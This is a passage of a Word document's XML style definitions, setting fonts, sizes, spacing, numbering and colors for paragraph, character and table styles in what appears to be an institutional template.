    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Text3"/>
    <w:link w:val="CodeChar"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Text3Char">
    <w:name w:val="Text 3 Char"/>
    <w:link w:val="Text3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="18"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:locked/>
    <w:rsid w:val="0071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eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mb5">
    <w:name w:val="mb5"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Text1Char">
    <w:name w:val="Text 1 Char"/>
    <w:link w:val="Text1"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListNumberChar">
    <w:name w:val="List Number Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListBullet1Char">
    <w:name w:val="List Bullet 1 Char"/>
    <w:link w:val="ListBullet1"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListNumber1Char">
    <w:name w:val="List Number 1 Char"/>
    <w:link w:val="ListNumber1"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListBulletChar">
    <w:name w:val="List Bullet Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Text2Char">
    <w:name w:val="Text 2 Char"/>
    <w:link w:val="Text2"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Text2Char1">
    <w:name w:val="Text 2 Char1"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text">
    <w:name w:val="text"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet5">
    <w:name w:val="List Bullet 5"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOCHeading1">
    <w:name w:val="TOC Heading1"/>
    <w:basedOn w:val="TOAHeading"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLVariable">
    <w:name w:val="HTML Variable"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Tableheadings">
    <w:name w:val="Table headings"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Tablecontent">
    <w:name w:val="Table content"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:after="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="attribute-value">
    <w:name w:val="attribute-value"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="start-tag">
    <w:name w:val="start-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="attribute-name">
    <w:name w:val="attribute-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="end-tag">
    <w:name w:val="end-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="message">
    <w:name w:val="message"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DateChar">
    <w:name w:val="Date Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line1">
    <w:name w:val="line1"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet10">
    <w:name w:val="List Bullet1"/>
    <w:basedOn w:val="ListBullet"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="454"/>
        <w:tab w:val="left" w:pos="284"/>
      </w:tabs>
      <w:ind w:left="284" w:hanging="360"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Citation1">
    <w:name w:val="Citation1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="454" w:right="454"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="gterm">
    <w:name w:val="gterm"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="subheading">
    <w:name w:val="subheading"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="netheadersviewsource">
    <w:name w:val="netheadersviewsource"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="StyleListNumberBlue1">
    <w:name w:val="Style List Number + Blue1"/>
    <w:basedOn w:val="ListNumber"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="454"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-headline">
    <w:name w:val="mw-headline"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vote-count-post">
    <w:name w:val="vote-count-post"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vote-accepted-on">
    <w:name w:val="vote-accepted-on"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="StyleListBullet1After12pt">
    <w:name w:val="Style List Bullet 1 + After:  12 pt"/>
    <w:basedOn w:val="ListBullet1"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
      </w:tabs>
      <w:spacing w:after="240"/>
      <w:ind w:left="283" w:hanging="283"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="htmltag1">
    <w:name w:val="html_tag1"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="entity">
    <w:name w:val="entity"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="error">
    <w:name w:val="error"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLTypewriter">
    <w:name w:val="HTML Typewriter"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="StyleListNumberUnderline1">
    <w:name w:val="Style List Number + Underline1"/>
    <w:basedOn w:val="ListNumber"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="454"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:u w:val="single"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Sous-tche">
    <w:name w:val="Sous-tâche"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="13"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="site-title">
    <w:name w:val="site-title"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBulletBold">
    <w:name w:val="List Bullet + Bold"/>
    <w:basedOn w:val="Text1"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="LightList-Accent11">
    <w:name w:val="Light List - Accent 11"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang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Columns3">
    <w:name w:val="Table Columns 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz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StyleListNumberBlue">
    <w:name w:val="Style List Number + Blue"/>
    <w:basedOn w:val="ListNumber"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
        <w:tab w:val="left" w:pos="454"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBulletAfter12pt">
    <w:name w:val="List Bullet + After:  12 pt"/>
    <w:basedOn w:val="ListBullet"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
      </w:tabs>
      <w:spacing w:after="240"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLAcronym">
    <w:name w:val="HTML Acronym"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="highlight">
    <w:name w:val="highlight"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ui-g-12">
    <w:name w:val="ui-g-12"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code0">
    <w:name w:val="code"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="beneficiarymayor">
    <w:name w:val="beneficiarymayor"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st">
    <w:name w:val="st"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBulletm">
    <w:name w:val="List Bulletm"/>
    <w:basedOn w:val="ListBullet1"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text30">
    <w:name w:val="Text  3"/>
    <w:basedOn w:val="ListBullet"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:left="283"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:u w:val="single"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="reportedpattern">
    <w:name w:val="reported_pattern"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="bodh1">
    <w:name w:val="bodh1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Patternfound199557">
    <w:name w:val="Pattern found: 199557"/>
    <w:basedOn w:val="ListNumber3Level2"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="907"/>
      </w:tabs>
      <w:ind w:left="907" w:hanging="453"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="Heading3"/>
    <w:autoRedefine/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="10"/>
      </w:numPr>
      <w:spacing w:before="60"/>
      <w:ind w:left="0"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:u w:val="single"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumberLevel1">
    <w:name w:val="List Number (Level 1)"/>
    <w:basedOn w:val="ListNumberLevel2"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:left="1080" w:hanging="360"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyPlaceholderText">
    <w:name w:val="BodyPlaceholderText"/>
    <w:basedOn w:val="PlaceholderText"/>
    <w:semiHidden/>
    <w:rPr>
      <w:color w:val="3366CC"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CrossReference">
    <w:name w:val="Cross Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="2"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InstructionBlue">
    <w:name w:val="InstructionBlue"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="3366CC"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InstructionPlaceholder">
    <w:name w:val="InstructionPlaceholder"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:color w:val="CB3535"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InstructionRed">
    <w:name w:val="InstructionRed"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="CB3535"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MarkingLabel">
    <w:name w:val="MarkingLabel"/>
    <w:semiHidden/>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MarkingText">
    <w:name w:val="MarkingText"/>
    <w:semiHidden/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:semiHidden/>
    <w:rPr>
      <w:color w:val="288061"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AfterTable">
    <w:name w:val="After Table"/>
    <w:semiHidden/>
    <w:rPr>
      <w:sz w:val="4"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AnnexTitle">
    <w:name w:val="AnnexTitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="14"/>
      </w:numPr>
      <w:spacing w:after="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ChapterTitle">
    <w:name w:val="ChapterTitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="SectionTitle"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="720" w:after="360"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
